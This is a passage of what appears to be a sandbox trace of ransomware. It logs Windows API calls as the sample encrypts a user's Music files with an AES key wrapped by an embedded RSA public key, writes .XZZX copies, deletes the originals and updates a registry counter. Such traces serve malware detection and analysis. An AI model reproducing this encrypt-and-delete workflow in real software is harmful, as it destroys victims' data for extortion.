param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\2--S BWBtG7 nG.mp3") returned 77 [0115.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0115.400] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX") returned 96 [0115.400] StrStrW (lpFirst="2--S BWBtG7 nG.mp3", lpSrch="XZZX") returned 0x0 [0115.400] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\2--S BWBtG7 nG.mp3", dwFileAttributes=0x20) returned 1 [0115.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\2--S BWBtG7 nG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\2--s bwbtg7 ng.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0115.402] ReadFile (in: hFile=0x50c, lpBuffer=0x3cc7980, nNumberOfBytesToRead=0xb4da, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cc7980*, lpNumberOfBytesRead=0x420e418*=0xb4da, lpOverlapped=0x0) returned 1 [0115.405] CloseHandle (hObject=0x50c) returned 1 [0115.405] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0115.405] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0115.406] SetErrorMode (uMode=0x1) returned 0x1 [0115.406] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0115.406] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc5aa8) returned 1 [0115.409] CryptGenKey (in: hProv=0x3cc5aa8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5650) returned 1 [0115.659] CryptExportKey (in: hKey=0x3a5650, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0115.660] CryptExportKey (in: hKey=0x3a5650, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0115.660] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0115.660] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0115.660] CryptDestroyKey (hKey=0x3a5650) returned 1 [0115.660] CryptReleaseContext (hProv=0x3cc5aa8, dwFlags=0x0) returned 1 [0115.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\2addd7ce37de6c473adf3b8e3bff508f.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x518 [0115.661] WriteFile (in: hFile=0x518, lpBuffer=0x3cc7980*, nNumberOfBytesToWrite=0xb4da, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc7980*, lpNumberOfBytesWritten=0x420e438*=0xb4da, lpOverlapped=0x0) returned 1 [0115.663] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb4da [0115.663] WriteFile (in: hFile=0x518, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0115.663] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb4df [0115.664] WriteFile (in: hFile=0x518, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x24, lpOverlapped=0x0) returned 1 [0115.664] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb503 [0115.664] WriteFile (in: hFile=0x518, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0115.664] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb508 [0115.664] SetErrorMode (uMode=0x1) returned 0x1 [0115.664] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0115.664] OutputDebugStringW (lpOutputString="end") [0115.664] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0115.664] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0115.664] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc5aa8) returned 1 [0115.665] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc5aa8, dwCertEncodingType=0x1, pInfo=0x3cb0728*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb0758*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb0760*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5750) returned 1 [0115.665] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0115.666] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0115.666] CryptEncrypt (in: hKey=0x3a5750, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0115.666] CryptEncrypt (in: hKey=0x3a5750, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc5b30*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc5b30*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0115.666] WriteFile (in: hFile=0x518, lpBuffer=0x3cc5b30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc5b30*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0115.666] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0115.667] WriteFile (in: hFile=0x518, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0115.667] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0115.667] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0115.667] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x51c) returned 0x0 [0115.667] RegQueryValueExW (in: hKey=0x51c, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x6a, lpcbData=0x420dfdc*=0x4) returned 0x0 [0115.667] RegCloseKey (hKey=0x51c) returned 0x0 [0115.667] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x51c) returned 0x0 [0115.667] RegSetValueExW (in: hKey=0x51c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x6b, cbData=0x4 | out: lpData=0x420dfec*=0x6b) returned 0x0 [0115.667] RegCloseKey (hKey=0x51c) returned 0x0 [0115.668] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0115.668] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0115.668] CloseHandle (hObject=0x518) returned 1 [0115.669] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0115.670] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0115.670] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\2--S BWBtG7 nG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\2--s bwbtg7 ng.mp3")) returned 1 [0115.671] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\2--S BWBtG7 nG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\2--s bwbtg7 ng.mp3")) returned 0 Thread: id = 362 os_tid = 0x8b0 [0115.645] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0115.645] lstrcpyW (in: lpString1=0x434f460, lpString2="23947E243409DC7CAF2C62063821C0C4.XZZX" | out: lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX") returned="23947E243409DC7CAF2C62063821C0C4.XZZX" [0115.645] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0115.645] SetErrorMode (uMode=0x1) returned 0x1 [0115.645] lstrcpyW (in: lpString1=0x434f860, lpString2="23947E243409DC7CAF2C62063821C0C4.XZZX" | out: lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX") returned="23947E243409DC7CAF2C62063821C0C4.XZZX" [0115.645] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x4645073f, Data2=0x421, Data3=0x4218, Data4=([0]=0xb9, [1]=0xb8, [2]=0xd0, [3]=0x10, [4]=0x26, [5]=0x70, [6]=0x12, [7]=0xa6))) returned 0x0 [0115.645] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\23947E243409DC7CAF2C62063821C0C4.XZZX") returned 96 [0115.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0115.645] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\2302EB1F0110E5184645073F0545C960.XZZX") returned 96 [0115.645] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 363 os_tid = 0x8b4 [0115.743] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0115.743] lstrcpyW (in: lpString1=0x420f460, lpString2="51A5A3C031894064FCB3CED0366624AC.XZZX" | out: lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX") returned="51A5A3C031894064FCB3CED0366624AC.XZZX" [0115.743] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0115.743] SetErrorMode (uMode=0x1) returned 0x1 [0115.743] lstrcpyW (in: lpString1=0x420f860, lpString2="51A5A3C031894064FCB3CED0366624AC.XZZX" | out: lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX") returned="51A5A3C031894064FCB3CED0366624AC.XZZX" [0115.743] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa335ded6, Data2=0xa3b, Data3=0x4d64, Data4=([0]=0x98, [1]=0xf2, [2]=0xf2, [3]=0x5, [4]=0x51, [5]=0x5e, [6]=0xad, [7]=0x32))) returned 0x0 [0115.743] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\51A5A3C031894064FCB3CED0366624AC.XZZX") returned 96 [0115.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0115.743] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\B81EB7520317BE0CA335DED60738A254.XZZX") returned 96 [0115.743] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 364 os_tid = 0x8b8 [0115.899] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0115.899] lstrcpyW (in: lpString1=0x420f460, lpString2="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" | out: lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX") returned="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" [0115.900] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0115.900] SetErrorMode (uMode=0x1) returned 0x1 [0115.900] lstrcpyW (in: lpString1=0x420f860, lpString2="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" | out: lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX") returned="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" [0115.900] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xfda08a42, Data2=0xf7fe, Data3=0x401f, Data4=([0]=0x8b, [1]=0xb, [2]=0x40, [3]=0x9c, [4]=0xa9, [5]=0xb0, [6]=0x14, [7]=0xdc))) returned 0x0 [0115.900] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\54E892FC383D1FA0EE2D03953C6A03E8.XZZX") returned 96 [0115.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0115.900] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\8AAEDB7C3E1D87C2FDA08A42423E6C0A.XZZX") returned 96 [0115.900] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 365 os_tid = 0x8bc [0116.055] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0116.055] lstrcpyW (in: lpString1=0x420f460, lpString2="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" | out: lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX") returned="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" [0116.055] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0116.055] SetErrorMode (uMode=0x1) returned 0x1 [0116.055] lstrcpyW (in: lpString1=0x420f860, lpString2="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" | out: lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX") returned="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" [0116.055] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x6d92f0be, Data2=0x1a7b, Data3=0x4615, Data4=([0]=0xa1, [1]=0x28, [2]=0x30, [3]=0xd9, [4]=0x81, [5]=0x88, [6]=0x88, [7]=0x1))) returned 0x0 [0116.055] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6D35692C49D86B1ADE80FADA4DF04F62.XZZX") returned 96 [0116.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0116.056] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\920CF74A073FCE176D92F0BE0B60B25F.XZZX") returned 96 [0116.056] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 366 os_tid = 0x8c0 [0116.212] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0116.212] lstrcpyW (in: lpString1=0x420f460, lpString2="A191878831212978B3B60CE1354E0DC0.XZZX" | out: lpString1="A191878831212978B3B60CE1354E0DC0.XZZX") returned="A191878831212978B3B60CE1354E0DC0.XZZX" [0116.212] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0116.212] 